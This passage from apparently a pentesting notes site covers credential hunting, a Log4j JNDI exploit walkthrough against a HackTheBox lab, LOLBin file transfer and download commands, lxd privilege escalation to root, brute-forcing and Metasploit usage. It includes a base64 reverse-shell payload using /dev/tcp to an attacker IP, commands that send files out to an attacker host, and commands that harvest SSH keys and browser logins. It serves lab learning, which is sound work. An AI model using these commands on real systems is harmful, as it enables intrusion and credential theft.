    These are divided into the system-wide area (/etc/crontab) and user-dependent executions. Some applications and scripts require credentials to run and are therefore incorrectly entered in the cronjobs. Furthermore, there are the areas that are divided into different time ranges (/etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, /etc/cron.weekly). The scripts and files used by cron can also be found in /etc/cron.d/ for Debian-based distributions.
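
A quick manual sweep over those locations (a sketch; adjust the paths to the distribution):

cat /etc/crontab\nls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ 2>/dev/null\n\n# Look for credentials incorrectly entered in cron scripts\ngrep -ri \"pass\\|user\" /etc/cron* 2>/dev/null\n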

    ","tags":["linux"]},{"location":"linux/#ssh-keys","title":"SSH Keys","text":"
    grep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n
    ","tags":["linux"]},{"location":"linux/#bash-history","title":"Bash History","text":"
    tail -n5 /home/*/.bash*\n
    ","tags":["linux"]},{"location":"linux/#logs","title":"Logs","text":"Log File Description /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs.
     for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null); if [[ $GREP ]];then echo -e \"\\n#### Log file: \" $i; grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null;fi;done\n
    ","tags":["linux"]},{"location":"linux/#credentials-storage","title":"Credentials storage","text":"","tags":["linux"]},{"location":"linux/#shadow-file","title":"Shadow file","text":"

    The /etc/shadow file has a unique format in which the entries are entered and saved when new users are created.

    htb-student:    $y$j9T$3QSBB6CbHEu...SNIP...f8Ms:   18955:  0:  99999:  7:  :   :   :\n<username>:     <encrypted password>:   <day of last change>:   <min age>:  <max age>:  <warning period>:   <inactivity period>:    <expiration date>:  <reserved field>\n

    The encryption of the password in this file is formatted as follows:

$<id>$<salt>$<hashed>
Example: $y$j9T$3QSBB6CbHEu...SNIP...f8Ms

    The type (id) is the cryptographic hash method used to encrypt the password. Many different cryptographic hash methods were used in the past and are still used by some systems today.

$1$: MD5
$2a$: Blowfish
$5$: SHA-256
$6$: SHA-512
$sha1$: SHA1crypt
$y$: Yescrypt
$gy$: Gost-yescrypt
$7$: Scrypt

    The /etc/shadow file can only be read by the user root.

    ","tags":["linux"]},{"location":"linux/#passwd-file","title":"Passwd file","text":"

The /etc/passwd file has the following format:

    htb-student:    x:  1000:   1000:   ,,,:    /home/htb-student:  /bin/bash\n<username>:     <password>:     <uid>:  <gid>:  <comment>:  <home directory>:   <cmd executed after logging in>\n

    The x in the password field indicates that the encrypted password is in the /etc/shadow file.

    ","tags":["linux"]},{"location":"linux/#opasswd","title":"Opasswd","text":"

    The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

    # Reading /etc/security/opasswd\nsudo cat /etc/security/opasswd\n\n# cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1\n

    Looking at the contents of this file, we can see that it contains several entries for the user cry0l1t3, separated by a comma (,). Another critical point to pay attention to is the hashing type that has been used. This is because the MD5 ($1$) algorithm is much easier to crack than SHA-512. This is especially important for identifying old passwords and maybe even their pattern because they are often used across several services or applications. We increase the probability of guessing the correct password many times over based on its pattern.
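
For example, the $1$ entries above can be fed straight to john (md5crypt is john's format name for MD5-based crypt(3) hashes; the wordlist path is a common Kali default):

# Save the comma-separated hashes one per line, then:\njohn --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt opasswd_hashes.txt\n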

    ","tags":["linux"]},{"location":"linux/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

Tools for dumping credentials from memory: mimipenguin, lazagne.

    Firefox stored credentials:

    ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

The tool Firefox Decrypt is excellent for decrypting these credentials and is updated regularly. It requires Python 3.9 to run the latest version; otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.
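
Basic usage is a sketch like this (pass the profile directory enumerated above):

python3 firefox_decrypt.py ~/.mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/\n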

    ","tags":["linux"]},{"location":"log4j/","title":"Log4j","text":"

The Log4j vulnerability can be exploited by injecting operating system commands (OS Command Injection). Log4j is a popular logging library for Java created in 2001. The logging library's main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files rather than code.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#what-it-does","title":"What it does","text":"

What a logging library does is, instead of using print statements, the developer uses a wrapper around the Logging class or object. So instead of using print(line), the code would look like this:

    logging.INFO(\u201cApplication Started\u201d)\nlogging.WARN(\u201cFile Uploaded\u201d)\nlogging.DEBUG(\u201cSQL Query Ran\u201d)\n

    Then the application has a configuration file which says what log levels (INFO, WARN, DEBUG, etc.) to display. This way when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#reconnaissance-proof-of-concept","title":"Reconnaissance - Proof of Concept","text":"

    The main way people have been testing if an application is vulnerable is by combining this vulnerability with JNDI.

    Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.

    In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

LDAP is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a network. The default port that LDAP runs on is port 389.

    Proof of concepts to see if it is vulnerable:

    1. Grab the request with the injectable parameter.

    2. In the injectable parameter, inject something like this:

    \"${jndi:ldap://AtackerIP/whatever}\"\n

    With tcpdump, check if the request with the payload produces some traffic to your attacker machine:

    sudo tcpdump -i tun0 port 389\n# -i: Select interface\n# port: indicate the port where traffic is going to be captured. \n

    The tcpdump output shows a connection being received on our machine. This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#exploitation","title":"Exploitation","text":"
# Install Open-JDK and Maven as requirements\nsudo apt install openjdk-11-jre maven\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's built, make a reverse shell in base64 with the attacker machine IP and listening port\necho 'bash -c bash -i >&/dev/tcp/AttackerIP/AttackerPort 0>&1' | base64\n# This will return something similar to this: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of the rogue-jndi folder and run:\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, copy-paste your reverse shell in base64\n# --hostname: Victim IP\n\n# Now, open a terminal and launch [[netcat]] on the listening port you defined in your payload.\n

    With Burpsuite, get a request for login:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

This request is from the HackTheBox machine Unified. As we can read from the UniFi version exploit, the injectable parameter is \"remember\", so we insert our payload there and send the request with Repeater:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

Once we send that request, our rogue JNDI server will serve the reverse shell payload:

    And in our terminal with the nc listener we will get the reverse shell.

The misinterpretation of a logged value (such as the User-Agent) leads to a JNDI lookup, which is executed as a command from the system with administrator privileges and queries a remote server controlled by the attacker, which in our case is the Destination in our concept of attacks. This query requests a Java class created and manipulated by the attacker for their own purposes. The queried Java code inside the manipulated Java class gets executed in the same process, leading to a remote code execution (RCE) vulnerability. GovCERT.ch has created an excellent graphical representation of the Log4j vulnerability that is worth examining in detail. Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#related-labs","title":"Related labs","text":"

    Walkthrough HackTheBox machine: Unified.

    ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"lolbins-lolbas-gtfobins/","title":"LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins","text":"

    The term LOLBins (Living off the Land binaries) came from a Twitter discussion on what to call binaries that an attacker can use to perform actions beyond their original purpose. There are currently two websites that aggregate information on Living off the Land binaries:

    • LOLBAS Project for Windows Binaries
    • GTFOBins for Linux Binaries
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#windows-lolbas","title":"Windows - LOLBAS","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#certreqexe","title":"CertReq.exe","text":"

    Let's use CertReq.exe as an example.

# From the victim's machine we can send, for instance, file.txt to our Kali\ncertreq.exe -Post -config http://$ipKali c:\\folder\\file.txt\n\n# From the Kali machine, the attacking one, we use a netcat session\nsudo nc -lvnp 80\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#linux-gtfobins","title":"Linux - GTFOBins","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#openssl","title":"OpenSSL","text":"
    # Create Certificate in our attacker machine\nopenssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n\n# Stand up the Server in our attacker machine\nopenssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh\n\n# Download File to the victim's Machine, but run command from the attacker kali\nopenssl s_client -connect $ipVictim:80 -quiet > LinEnum.sh\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#other-common-living-off-the-land-tools","title":"Other Common Living off the Land tools","text":"","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#bitsadmin-download-function","title":"Bitsadmin Download function","text":"

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work.

    # File Download with Bitsadmin\nbitsadmin /transfer wcb /priority foreground http://$ip:8000/nc.exe C:\\Users\\htb-student\\Desktop\\nc.exe\n

PowerShell can also interact with BITS: it enables file downloads and uploads, supports credentials, and can use specified proxy servers.

    # Download\nImport-Module bitstransfer; Start-BitsTransfer -Source \"http://$ip/nc.exe\" -Destination \"C:\\Temp\\nc.exe\"\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lolbins-lolbas-gtfobins/#download-a-file-with-certutil","title":"Download a File with Certutil","text":"

    Certutil can be used to download arbitrary files.

    certutil.exe -verifyctl -split -f http://$ip/nc.exe\n
    ","tags":["resources","binaries","pentesting"]},{"location":"lxd/","title":"lxd","text":"

    LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.

A member of the local "lxd" group can instantly escalate their privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

    Source: https://www.hackingarticles.in/lxd-privilege-escalation/. In this article, you can find a good explanation about how lxc works. Original source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071.

    ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#privileges-escalation","title":"Privileges escalation","text":"

Privilege escalation through lxd requires access to a local account that belongs to the lxd group.
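
A quick way to confirm that the compromised account is in the lxd group (assuming we already have a shell as that user):

# Check the groups of the current user\nid\ngroups | grep -i lxd\n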

In order to escalate to root privileges on the host machine, you have to create an image for lxd. Thus, you need to perform the following actions:

    Steps to be performed on the attacker machine:

# Download build-alpine to your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \"build-alpine\" that will build the latest Alpine image as a compressed file. This step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start the apache2 service.\n

    Steps to be performed on the victim machine:

# Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AttackerIP/alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the host filesystem inside the container under /mnt/root\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Start the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n
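
Once inside the container we are root, and the host's entire filesystem is available under /mnt/root (because of the disk device added above), so we can, for example, read root-owned files on the host:

# Inside the container: the host filesystem is mounted at /mnt/root\ncat /mnt/root/etc/shadow\nls /mnt/root/root\n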
    ","tags":["privilege escalation","linux","lxd"]},{"location":"lxd/#related-labs","title":"Related labs","text":"

    HackTheBox machine Included.

    ","tags":["privilege escalation","linux","lxd"]},{"location":"m365-cli/","title":"M365 CLI","text":"","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#installation","title":"Installation","text":"

    Source: https://pnp.github.io/cli-microsoft365/cmd/docs/

    Install m365 cli from: https://github.com/pnp/cli-microsoft365

    Login into Microsoft:

    m365 login  \n

You will be prompted to open a browser with this url: https://microsoft.com/devicelogin. Enter the code that the prompt indicates and log in as the M365 user.

    ","tags":["Microsoft 365","pentesting"]},{"location":"m365-cli/#ennumeration-techniques","title":"Ennumeration techniques","text":"

    Get information about the default Power Apps environment.

    m365 pa environment get  \n

    List Microsoft Power Apps environments in the current tenant

    m365 pa environment list \n

    List all available apps for that user

    m365 pa app list  \n

    List all apps in an environment as Admin

    m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Remove an app

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

    Removes the specified Power App without confirmation

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

    Removes the specified Power App you don't own

m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default-00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Add an owner without removing the old one

    m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

    Export an app

    m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
    ","tags":["Microsoft 365","pentesting"]},{"location":"machines/","title":"Machines and lab resources","text":"machine OWASP Juice Shop Is a modern vulnerable web application written in Node.js, Express, and Angular which showcases the entire\u00a0OWASP Top Ten\u00a0along with many other real-world application security flaws. Metasploitable 2 Is a purposefully vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated, and manual exploitation. Metasploitable 3 Is a template for building a vulnerable Windows VM configured with a wide range of\u00a0vulnerabilities. DVWA This is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities with varying degrees of difficulty. VAPI vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises. https://overthewire.org/wargames/ The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Linux https://underthewire.tech/wargames The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. Windows

    Pro Lab has a specific scenario and level of difficulty:

| Lab | Scenario |
| --- | --- |
| Dante | Beginner-friendly lab to learn common pentesting techniques and methodologies, common pentesting tools, and common vulnerabilities. |
| Offshore | Active Directory lab that simulates a real-world corporate network. |
| Cybernetics | Simulates a fully-upgraded and up-to-date Active Directory network environment, which is hardened against attacks. It is aimed at experienced penetration testers and Red Teamers. |
| RastaLabs | Red Team simulation environment, featuring a combination of attacking misconfigurations and simulated users. |
| APTLabs | This lab simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider) and is the most advanced Pro Lab offered at this time. |

"},{"location":"mariadb/","title":"MariaDB","text":"

MariaDB is an open source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by the MariaDB Foundation and was initially released on 29 October 2009. MariaDB adds a significant number of new features, which gives it an edge over MySQL in terms of performance and user orientation.

    ","tags":["database","relational database","SQL"]},{"location":"mariadb/#basic-commands","title":"Basic commands","text":"
    # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n
    ","tags":["database","relational database","SQL"]},{"location":"mariadb/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
# -h: host/IP\n# -u: user. By default, MariaDB has a root user with no authentication\nmariadb -h <host/IP> -u root\n
    ","tags":["database","relational database","SQL"]},{"location":"markdown/","title":"Markdown","text":"","tags":["tool","language"]},{"location":"markdown/#titles-code","title":"Titles: code","text":"
    # H1\n
    ## H2\n
    ### H3\n
    ","tags":["tool","language"]},{"location":"markdown/#formating-the-text","title":"Formating the text","text":"
    *italic*   \n
    **bold**\n
    ==highlight==\n
    ","tags":["tool","language"]},{"location":"markdown/#blockquote-code","title":"Blockquote code","text":"
    > blockquote\n
    ","tags":["tool","language"]},{"location":"markdown/#lists","title":"Lists","text":"

    Bullets

    + One bullet\n+ Second Bullet\n+ Third bullet\n

    Ordered lists

    1. First item in list\n2. Second item in list\n

    Item list

    - First item\n- Second item\n- Third item\n
    ","tags":["tool","language"]},{"location":"markdown/#horizontal-rule","title":"Horizontal rule","text":"
    --- \n
    ","tags":["tool","language"]},{"location":"markdown/#links","title":"Links","text":"
    [link](https://www.example.com)\n
    ","tags":["tool","language"]},{"location":"markdown/#image-code","title":"Image: code","text":"
    ![alt text](image.jpg)\n
    ","tags":["tool","language"]},{"location":"markdown/#tables","title":"Tables","text":"
    | ColumnName | ColumnName |\n| ---------- | ---------- |\n| Content | Content that you want |\n
    ","tags":["tool","language"]},{"location":"markdown/#footnote-code","title":"Footnote: code","text":"
    Here's a sentence with a footnote. [^1]\n\n[^1]: This is the footnote. \n
    ","tags":["tool","language"]},{"location":"markdown/#task-list","title":"Task list","text":"
    - [x] Write the press release\n- [ ] Update the website\n- [ ] Contact the media \n
    ","tags":["tool","language"]},{"location":"markdown/#fenced-coded-block-code","title":"Fenced coded block: code","text":"
    \\```\ncode inside\n\\```\n
    ","tags":["tool","language"]},{"location":"markdown/#strikethrough","title":"Strikethrough","text":"
    ~~Love is flat.~~ \n
    ","tags":["tool","language"]},{"location":"markdown/#emojis","title":"Emojis","text":"
    :emoji-code: \n
    ","tags":["tool","language"]},{"location":"masscan/","title":"masscan - An IP scanner","text":"

    Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.

    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#installation","title":"Installation","text":"
    sudo apt-get install git gcc make libpcap-dev\ngit clone https://github.com/robertdavidgraham/masscan\ncd masscan/\nmake\n

    \"make\" puts the program in the masscan/bin subdirectory. To install it (on Linux) run:

    make install\n

The source consists of a lot of small files, so building goes a lot faster by using the multi-threaded build. This requires more than 2 GB of memory (and breaks on a Raspberry Pi), so you might use a smaller number of jobs, like -j4, rather than all possible threads.

    make -j\n

Make sure that it is running properly:

    cd bin\n./masscan --regress\n
    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#usage","title":"Usage","text":"

    Usage is similar to nmap. To scan a network segment for some ports:

./masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 10.0.2.1/24 -e tcp0 --router-ip 10.0.2.2  --echo >  masscan.conf\n# To see the complete list of options, use the `--echo` feature. This dumps the current configuration and exits. This output can be used as input back into the program:\n

    Another example:

    masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112\n# This will scan the `10.x.x.x` subnet, and `2603:3001:2d00:da00::x` subnets\n# Scan port 80 and the range 8000 to 8100, or 102 ports total, on both subnets\n# Print output to `<stdout>` that can be redirected to a file\n
    ","tags":["reconnaissance","scanning"]},{"location":"masscan/#editing-config-file","title":"Editing config file","text":"
    nano masscan.conf\n# here, you add:  output-filename = scan.list //also json, xml\n

Now run it again using the configuration file:

    masscan -c masscan.conf\n
    ","tags":["reconnaissance","scanning"]},{"location":"medusa/","title":"Medusa","text":"

Medusa is a speedy, parallel, and modular login brute-forcer. Its goal is to support as many services that allow remote authentication as possible.

    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#installation","title":"Installation","text":"

    Pre-installed in Kali.

wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz\n# Extract the tarball and enter the directory before building\ntar -xzf medusa-2.2.tar.gz\ncd medusa-2.2\n./configure\nmake\nmake install\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"medusa/#basic-usage","title":"Basic usage","text":"
    # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n# -n: for a different non-default port. For instance, port 2121 for ftp \n
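
Another illustrative run, this time brute-forcing SSH with a list of usernames (users.txt is a hypothetical file; -t sets the number of concurrent login attempts):

medusa -U users.txt -P /usr/share/wordlists/rockyou.txt -h $IP -M ssh -t 4\n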
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"metasploit/","title":"metasploit","text":"

Developed in Ruby by Rapid7. The "free" edition comes preinstalled in Kali at /usr/share/metasploit-framework.

    ","tags":["pentesting"]},{"location":"metasploit/#run-metasploit","title":"Run metasploit","text":"
    # start the postgresql service\nservice postgresql start \n\n# Initiate database\nsudo msfdb init\u00a0\n\n# Launch metasploit from terminal. -q means without banner\nmsfconsole -q\u00a0 \n
    ","tags":["pentesting"]},{"location":"metasploit/#update-metasploit","title":"Update metasploit","text":"

    How to update metasploit database, since msfupdate is deprecated.

# Update the whole system\napt update && apt upgrade -y\n\n# Update libraries and dependencies\napt dist-upgrade\n\n# Reinstall the app\napt install metasploit-framework\n
    ","tags":["pentesting"]},{"location":"metasploit/#basic-commands","title":"Basic commands","text":"
    # Help information\nshow -h\u00a0 \n
=========================\n\nDatabase Backend Commands\n\n=========================\n\ndb_connect        Connect to an existing data service\n\ndb_disconnect     Disconnect from the current data service\n\ndb_export         Export a file containing the contents of the database\nBefore closing the session, save a backup:\ndb_export -f xml backup.xml\n\ndb_import         Import a scan result file (filetype will be auto-detected)\nFor instance: \ndb_import Target.xml\ndb_import Target.nmap\n\ndb_nmap           Executes nmap and records the output automatically\n\nAfter that, we can query: \nhosts\n# The hosts command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions.\n# hosts -h # to see all commands with hosts \n\nservices\n# It contains a table with descriptions and information on services discovered during scans or interactions.\n# services -h # to see all commands with services \n\ncreds\n# The creds command allows you to visualize the credentials gathered during your interactions with the target host.\n# creds -h # to see all commands with creds \n\nloot\n# The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.\n# loot -h # to see all commands with loot \n\ndb_rebuild_cache  Rebuilds the database-stored module cache (deprecated)\n\ndb_remove         Remove the saved data service entry\n\ndb_save           Save the current data service connection as the default to reconnect on startup\n\ndb_status         Show the current data service status\n\nhosts             List all hosts in the database\n\nloot              List all loot in the database\n\nnotes             List all notes in the database\n\nservices          List all services in the database\n\nvulns             List all vulnerabilities in the database\n\nworkspace         Switch between databases\nworkspace         List workspaces\nworkspace -v      List workspaces verbosely\nworkspace [name]  Switch workspace\nworkspace -a [name] ...    Add workspace(s)\nworkspace -d [name] ...    Delete workspace(s)\nworkspace -D     Delete all workspaces\nworkspace -r     Rename workspace\nworkspace -h     Show this help information\n

    Cheat sheet:

# Search modules\nsearch <mysearchitem>\ngrep meterpreter show payloads\ngrep -c meterpreter grep reverse_tcp show payloads\n\n# Search for exploits for the service hfs 2.3\nsearchsploit hfs 2.3\n\n# Launch msfconsole and run the reload_all command for a newly installed module to appear in the list\nreload_all\n\n\n# Use a module\nuse <name of module (like exploit/cmd/linux/tcp_reverse) or number>\n\n# Show options of current module (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show options\n\n# Configure an option (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> set <option> <value>\n\n# Configure an option as a constant during the msf session (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> setg <option> <value>\n\n# Go back to the main msf prompt (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> back\n\n# View related information of the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> info\n\n# View related payloads of the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show payloads\n\n# Set a payload for the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> set payload <value>\n\n# Before we run an exploit-script, we can run a check to ensure the server is vulnerable (Note that not every exploit in the Metasploit Framework supports the `check` function)\nmsf6 exploit(windows/smb/ms17_010_psexec) > check\n\n# Run the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> run\n\n# Run the exploit (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> exploit\n\n# Run an exploit as a job by typing exploit -j\nexploit -j\n\n# See all sessions (Watch out, prompt is included)\nmsf> sessions\n\n# Switch to session number n (Watch out, prompt is included)\nmsf> sessions -i <n>\n\n# Kill all sessions (Watch out, prompt is included)\nmsf> sessions -K\n

To kill a session we don't use CTRL-C, because the port would still be in use. For that we have jobs:

    +++++++++\njobs\n++++++++++\n    -K        Terminate all running jobs.\n    -P        Persist all running jobs on restart.\n    -S <opt>  Row search filter.\n    -h        Help banner.\n    -i <opt>  Lists detailed information about a running job.\n    -k <opt>  Terminate jobs by job ID and/or range.\n    -l        List all running jobs.\n    -p <opt>  Add persistence to job by job ID\n    -v        Print more detailed info.  Use with -i and -l\n
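
For example, to list the running jobs and then kill one by its ID (job 0 assumed here):

jobs -l\njobs -k 0\n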
    ","tags":["pentesting"]},{"location":"metasploit/#databases","title":"Databases","text":"
# Start PostgreSQL\nsudo systemctl start postgresql\n\n# Initiate a Database\nsudo msfdb init\n\n# Check status\nsudo msfdb status\n\n# Connect to the Initiated Database\nsudo msfdb run\n\n# Reinitiate the Database\nmsfdb reinit\ncp /usr/share/metasploit-framework/config/database.yml ~/.msf4/\nsudo service postgresql restart\nmsfconsole -q\nmsf6 > db_status\n
    ","tags":["pentesting"]},{"location":"metasploit/#plugins","title":"Plugins","text":"

    To start using a plugin, we will need to ensure it is installed in the correct directory on our machine.

    ls /usr/share/metasploit-framework/plugins\n

    If the plugin is found here, we can fire it up inside msfconsole. Example:

    load nessus\n

    To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at /usr/share/metasploit-framework/plugins with the proper permissions. Many people write many different plugins for the Metasploit framework:

• nMap (pre-installed)
• NexPose (pre-installed)
• Nessus (pre-installed)
• Mimikatz (pre-installed V.1)
• Stdapi (pre-installed)
• Railgun
• Priv
• Incognito (pre-installed)
• Darkoperator's

